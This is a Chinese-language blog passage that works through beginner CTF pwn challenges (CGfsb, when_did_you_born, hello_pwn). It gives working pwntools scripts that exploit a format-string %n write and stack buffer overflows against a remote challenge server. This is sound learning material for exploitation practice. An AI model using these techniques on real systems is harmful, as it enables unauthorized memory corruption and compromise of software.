不知道多久的第二条咸鱼

老子满血复活啦!
啊哈!
然后把之前的pwn补一下

get_shell

题目描述打开就能获得flag
那就打开嘛


图片.png

做完了嘻嘻

CGfsb

IDA

图片.png

if(pwnme==8)就可以获得flag


图片.png

找到pwnme的地址


图片.png

nc一下发现输入的数据偏移量为10
然后利用格式化字符串漏洞
sh= remote('111.198.29.45',30267)

pwn_adr = 0x0804A068

payload1 = "ABCD" 
payload2 = p32(pwn_adr) + 'aaaa%10$n'
sh.recvuntil('please tell me your name:') 
sh.sendline(payload1)
sh.recvuntil('leave your message please:') 
sh.sendline(payload2)

32位占四个字节,再加4个字节对pwnme赋值为8


图片.png

when_did_you_born

IDA

图片.png

直接输入1926会被强制退出
然后v5必须等于1926
emmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
神经病

然后这里


图片.png

先输入v5再输入v4而v4和v5差8个字节
也就是说v4超过8字节后就会覆盖掉v5
哇哦

from pwn import *
#context.log_level='debug'

sh= remote('111.198.29.45',30287)

p1='aa'
p2='aaaaaaaa'+p64(1926)
sh.recvuntil("What's Your Birth?")
sh.sendline(p1)
sh.recvuntil("What's Your Name?")
sh.sendline(p2)

sh.interactive()

图片.png

emm明天继续补

hello_pwn

直接exp了这道题超级简单

from pwn import *

sh= remote('111.198.29.45', 30591)

sh.recvuntil('lets get helloworld for bof\n') 

shellcode = 'aaaa'+p64(1853186401) 

sh.send(shellcode)

print sh.recv()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • // com.adobe.flash.listen settings.gradle 定义项目包含那些模块app.i...
    zeromemcpy阅读 1,786评论 0 1
  • WEB 祝大家圣诞快乐!hhhhh sprintf看着像wp里面的,去漏洞平台搜了一下。应该是这个漏洞: 这个我不...
    RedTeamWing阅读 1,610评论 0 2
  • 0x01 Start checksec 的时候可以看到程序没有打开任何的安全保护措施,然后查看IDA下的汇编代码,...
    Nevv阅读 1,755评论 0 2
  • 文/添一抹岚 厚实的门,终于传来钥匙开门的悉嗦响。冻库大门即将打开,秋哥两手用力一挣,将拥他在怀的袁白露生硬地推开...
    添一抹岚阅读 1,472评论 5 7
  • 还记得《舌尖上的中国》系列吗?今年年初第三部《舌尖上的中国》上线后,一时间朋友圈都在谈论“舌尖”的话题。大多数人觉...
    此岸猿君阅读 284评论 0 1

友情链接更多精彩内容